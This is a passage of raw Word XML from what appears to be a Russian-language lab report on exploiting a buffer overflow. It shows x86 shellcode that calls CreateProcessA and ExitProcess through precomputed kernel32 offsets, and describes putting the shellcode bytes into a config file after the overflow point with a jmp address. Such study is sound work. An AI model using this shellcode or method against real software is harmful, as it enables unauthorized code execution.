          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7BE9">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">скрипт, результаты выполнения которого показаны на </w:t>
      </w:r>
      <w:r w:rsidR="00526B94">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00526B94">
        <w:instrText xml:space="preserve"> REF _Ref212422890 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00526B94">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00526B94">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00526B94">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00526B94">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464473E5" w14:textId="3ED28D1D" w:rsidR="00181AB2" w:rsidRDefault="00F06FFC" w:rsidP="00D34AC5">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34AC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E7C786A" wp14:editId="4070DA26">
            <wp:extent cx="6300470" cy="315023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22F0" w14:textId="1E8C48F5" w:rsidR="000C06B6" w:rsidRDefault="00181AB2" w:rsidP="00181AB2">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Ref2124228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5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t xml:space="preserve"> – Получение команд помещения строки на стек</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B04A508" w14:textId="21E495C7" w:rsidR="00181AB2" w:rsidRDefault="00181AB2" w:rsidP="00181AB2"/>
    <w:p w14:paraId="3002F75D" w14:textId="77777777" w:rsidR="00A67ED4" w:rsidRDefault="00B2002B" w:rsidP="00A67ED4">
      <w:r>
        <w:t>Аргументы функци</w:t>
      </w:r>
      <w:r w:rsidR="00730F58">
        <w:t>й</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> также передаются на стек</w:t>
      </w:r>
      <w:r w:rsidR="00730F58">
        <w:t xml:space="preserve"> перед вызовом, вызов осуществляется по смещению</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C99B63" w14:textId="0426408A" w:rsidR="00DB77E9" w:rsidRDefault="00A67ED4" w:rsidP="00DB77E9">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>STARTUPINFO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lastRenderedPageBreak/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68                   ; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>cb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>STARTUPINFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) = 68 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>PROCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>INFORMATION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push</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">                  ; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A67ED4">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">; Подготовка аргументов для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>CreateProcess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b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lpProcessInformation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a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lpStartupInfo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d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lpCurrentDirectory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = NULL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d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lpEnvironment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = NULL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d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dwCreationFlags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0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d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bInheritHandles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = FALSE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d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lpThreadAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = NULL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d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lpProcessAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = NULL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c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lpCommandLine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push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dx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">                  ; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>lpApplicationName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = NULL</w:t>
      </w:r>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>CreateProcessA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mov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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; kernel32.dll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lastRenderedPageBreak/>
        <w:t>xor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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>esi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mov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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, 0b0110101000101010 ; 0x00035150 / 8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shl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> esi,3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add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ax,esi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call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ax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mov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bx,eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ExitProcess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mov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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; kernel32.dll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xor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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>esi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mov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si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, 0b1001101010001000 ; 0x00026A20 / 4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shl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> esi,2</w:t>
      </w:r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add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ax,esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB77E9" w:rsidRPr="00DB77E9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C3FA17E" w14:textId="74CF8BA7" w:rsidR="00B2002B" w:rsidRPr="0080337A" w:rsidRDefault="00B2002B" w:rsidP="00DB77E9">
      <w:r w:rsidRPr="00DB77E9">
        <w:t xml:space="preserve">Для того, чтобы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:t>шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:t xml:space="preserve"> был </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:t>базонезависимым</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB77E9">
        <w:t xml:space="preserve">, были рассчитаны смещения функций относительно начала </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2002B">
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB77E9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Для этого при помощи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2002B">
        <w:t>32</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B2002B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>были получены требуемые адреса, как показано на</w:t>
      </w:r>
      <w:r w:rsidR="007C0F22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C0F22">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="007C0F22">
        <w:instrText xml:space="preserve"> REF _Ref212424822 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="007C0F22">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="007C0F22">
        <w:t xml:space="preserve">рисунках </w:t>
      </w:r>
      <w:r w:rsidR="007C0F22">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="007C0F22">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="007C0F22">
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidR="00AE0FD0">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="0080337A">
        <w:t xml:space="preserve">, и рассчитаны смещения при помощи </w:t>
      </w:r>
      <w:r w:rsidR="0080337A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="0080337A" w:rsidRPr="0080337A">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0080337A">
        <w:t>скрипта, как показано на</w:t>
      </w:r>
      <w:r w:rsidR="000808B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000808B2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000808B2">
        <w:instrText xml:space="preserve"> REF _Ref212424838 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="000808B2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AB3187">
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidR="00AE0FD0">
        <w:t>исун</w:t>
      </w:r>
      <w:r w:rsidR="00AB3187">
        <w:t>ке</w:t>
      </w:r>
      <w:r w:rsidR="00AE0FD0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE0FD0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="000808B2">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0080337A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1906D6D5" w14:textId="77777777" w:rsidR="00B2002B" w:rsidRDefault="000C06B6" w:rsidP="00B2002B">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="000C06B6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="591A8E73" wp14:editId="7D8D3A03">
            <wp:extent cx="6564779" cy="2912533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7741" cy="29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57C4" w14:textId="78F3F018" w:rsidR="003C5FC1" w:rsidRPr="00B2002B" w:rsidRDefault="00B2002B" w:rsidP="003F7FD1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Ref212424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6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t xml:space="preserve"> – Получение адреса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2002B">
        <w:t>32.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DE99E8D" w14:textId="77777777" w:rsidR="00B2002B" w:rsidRPr="00B2002B" w:rsidRDefault="00B2002B" w:rsidP="00B2002B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFD7EC9" w14:textId="77777777" w:rsidR="004E5ACF" w:rsidRDefault="00CA58F3" w:rsidP="004E5ACF">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="004E5ACF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E9DAF07" wp14:editId="42507EC7">
            <wp:extent cx="4023709" cy="12040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D1B" w14:textId="0E0FCAE9" w:rsidR="00E5587A" w:rsidRDefault="004E5ACF" w:rsidP="004E5ACF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7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Получение адреса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="541EB071" w14:textId="77777777" w:rsidR="00014C23" w:rsidRPr="00014C23" w:rsidRDefault="00014C23" w:rsidP="00014C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5FB187" w14:textId="77777777" w:rsidR="00A14844" w:rsidRDefault="00EF6501" w:rsidP="00A14844">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6501">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="020365D6" wp14:editId="57667983">
            <wp:extent cx="3858163" cy="914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4B37" w14:textId="50CC9A41" w:rsidR="00CA58F3" w:rsidRDefault="00A14844" w:rsidP="00A14844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8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Получение адреса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3300FC21" w14:textId="77777777" w:rsidR="00014C23" w:rsidRPr="00014C23" w:rsidRDefault="00014C23" w:rsidP="00014C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D837E66" w14:textId="43766F3A" w:rsidR="002235B3" w:rsidRDefault="005F6259" w:rsidP="002235B3">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="005F6259">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3195E554" wp14:editId="01CA8275">
            <wp:extent cx="6300470" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="508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6779" w14:textId="554DDA50" w:rsidR="00667309" w:rsidRDefault="002235B3" w:rsidP="002235B3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Ref2124248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19</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:t xml:space="preserve"> – Расчет смещений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0451AD5C" w14:textId="77777777" w:rsidR="001D232A" w:rsidRPr="001D232A" w:rsidRDefault="001D232A" w:rsidP="001D232A"/>
    <w:p w14:paraId="1A09E5AE" w14:textId="3BA627EC" w:rsidR="002235B3" w:rsidRDefault="001D232A" w:rsidP="002235B3">
      <w:r>
        <w:t xml:space="preserve">В байтовом представлении </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> имеет вид, показанный на</w:t>
      </w:r>
      <w:r w:rsidR="00AE3BF4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED703B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00ED703B">
        <w:instrText xml:space="preserve"> REF _Ref212424860 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00ED703B">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F75F1B">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00F75F1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00ED703B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5397C96F" w14:textId="20FADC83" w:rsidR="00D26EE5" w:rsidRDefault="00893893" w:rsidP="00D26EE5">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00893893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52EA432A" wp14:editId="0DF8E14C">
            <wp:extent cx="6300470" cy="20243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7C76" w14:textId="72784FED" w:rsidR="001D232A" w:rsidRPr="001D232A" w:rsidRDefault="00D26EE5" w:rsidP="00D26EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Ref2124248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0</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:t xml:space="preserve"> – Байтовое представление </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>шеллкода</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53A7F5EC" w14:textId="77777777" w:rsidR="002235B3" w:rsidRDefault="002235B3" w:rsidP="002235B3"/>
    <w:p w14:paraId="6F0ED2B5" w14:textId="6066A6DC" w:rsidR="00E41C36" w:rsidRDefault="00E41C36" w:rsidP="002235B3">
      <w:r>
        <w:t xml:space="preserve">Байтовое представление было занесено в конфиг-файл после бита, в котором произошло переполнение буфера и адреса инструкции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
